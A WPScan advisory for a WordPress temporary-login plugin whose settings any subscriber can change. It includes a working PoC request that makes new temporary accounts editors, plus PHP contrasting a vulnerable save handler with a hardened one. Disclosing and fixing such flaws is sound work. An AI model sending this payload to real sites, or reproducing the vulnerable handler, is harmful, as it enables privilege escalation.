WPVDB-ID: 15EED13F-3195-4F5D-8933-36695C830F4F
Source: wpvulndb (wpscan.com)
Reported by: Apple502j
Published: Nov 15, 2021 - 12:00 a.m.

Temporary Login Without Password < 1.7.1 - Subscriber+ Plugin's Settings Update


EPSS: 0.001 (Low), percentile 21.4%

The plugin does not perform authorisation or CSRF checks when updating its settings, which allows any logged-in user, such as a subscriber, to update them. The nonce parameter is read but never validated, so an arbitrary value is accepted.

PoC

jQuery.post("https://example.com/wp-admin/index.php", {
    "wtlwp-nonce": "foo", // Not validated
    tlwp_settings_data: {
        default_role: "editor",
        default_expiry_time: "month_after_access",
        visible_roles: ["editor", "administrator"],
        default_redirect_to: "wp_dashboard"
    }
})

POST /wp-admin/index.php HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 288
Connection: close
Cookie: [subscriber+]

wtlwp-nonce=foo&tlwp_settings_data%5Bdefault_role%5D=editor&tlwp_settings_data%5Bdefault_expiry_time%5D=month_after_access&tlwp_settings_data%5Bvisible_roles%5D%5B%5D=editor&tlwp_settings_data%5Bvisible_roles%5D%5B%5D=administrator&tlwp_settings_data%5Bdefault_redirect_to%5D=wp_dashboard
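As an added example, not the plugin's own code and not part of the original advisory, the PHP pattern behind this finding: a settings-save handler that stores tlwp_settings_data with no capability check and no nonce verification, beside a hardened version that applies current_user_can(), wp_verify_nonce() and strict value validation. The admin_init hook, the option name, the nonce action "tlwp_example_save" and every allowed value other than the ones appearing in the PoC are assumptions made for the example; only the request parameter names come from the advisory.

```php
<?php
/*
 * Added example for this advisory, not the plugin's code. Reconstructs the
 * vulnerable pattern (settings saved for any logged-in user, nonce never
 * checked) next to a hardened handler. Hook, option name, nonce action and
 * the non-PoC allowed values are assumptions.
 *
 * admin_init fires for every wp-admin request, including /wp-admin/index.php,
 * which a subscriber can load, so a handler on it is reachable by the PoC.
 */

// VULNERABLE: any authenticated user reaching wp-admin overwrites the
// settings; "wtlwp-nonce" is never verified, so "foo" is accepted.
function tlwp_example_vulnerable_save() {
    if ( ! isset( $_POST['tlwp_settings_data'] ) ) {
        return;
    }
    $settings = (array) wp_unslash( $_POST['tlwp_settings_data'] );
    update_option( 'tlwp_example_settings', $settings );
}

// HARDENED: authorisation check, then CSRF check, then strict validation.
function tlwp_example_hardened_save() {
    if ( ! isset( $_POST['tlwp_settings_data'] ) ) {
        return;
    }
    // 1. Authorisation: changing plugin settings is an admin-only capability.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'You are not allowed to change these settings.', 403 );
    }
    // 2. CSRF: the nonce must be valid for this action. The settings form
    //    emits it with wp_nonce_field( 'tlwp_example_save', 'wtlwp-nonce' ).
    $nonce = isset( $_POST['wtlwp-nonce'] ) ? (string) wp_unslash( $_POST['wtlwp-nonce'] ) : '';
    if ( ! wp_verify_nonce( $nonce, 'tlwp_example_save' ) ) {
        wp_die( 'Invalid or missing nonce.', 403 );
    }
    // 3. Validation: reject unknown keys and values before storing anything.
    $settings = tlwp_example_validate( (array) wp_unslash( $_POST['tlwp_settings_data'] ) );
    if ( null === $settings ) {
        wp_die( 'Invalid settings payload.', 400 );
    }
    update_option( 'tlwp_example_settings', $settings );
}

// Returns a clean settings array, or null if any field is unknown or invalid.
// Roles come from the site's role table; the other value sets are assumed.
function tlwp_example_validate( array $raw ) {
    $roles     = array_keys( wp_roles()->roles );
    $expiries  = array( 'hour', 'day', 'week', 'month', 'month_after_access' ); // assumed set
    $redirects = array( 'wp_dashboard', 'system_default' );                    // assumed set

    $role = isset( $raw['default_role'] ) ? sanitize_key( $raw['default_role'] ) : '';
    if ( ! in_array( $role, $roles, true ) ) {
        return null;
    }
    $expiry = isset( $raw['default_expiry_time'] ) ? sanitize_key( $raw['default_expiry_time'] ) : '';
    if ( ! in_array( $expiry, $expiries, true ) ) {
        return null;
    }
    $redirect = isset( $raw['default_redirect_to'] ) ? sanitize_key( $raw['default_redirect_to'] ) : '';
    if ( ! in_array( $redirect, $redirects, true ) ) {
        return null;
    }
    $visible = ( isset( $raw['visible_roles'] ) && is_array( $raw['visible_roles'] ) )
        ? array_map( 'sanitize_key', $raw['visible_roles'] )
        : array();
    if ( array_diff( $visible, $roles ) ) {
        return null;
    }

    return array(
        'default_role'        => $role,
        'default_expiry_time' => $expiry,
        'visible_roles'       => array_values( array_unique( $visible ) ),
        'default_redirect_to' => $redirect,
    );
}

// Only the hardened handler is registered; the vulnerable one is for contrast.
add_action( 'admin_init', 'tlwp_example_hardened_save' );
```

Both checks are needed: a capability check alone still lets an attacker relay the PoC through an administrator's browser (the CSRF half), and a nonce check alone does not stop a subscriber who can obtain a nonce for that action from a page they are allowed to view (the authorisation half).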

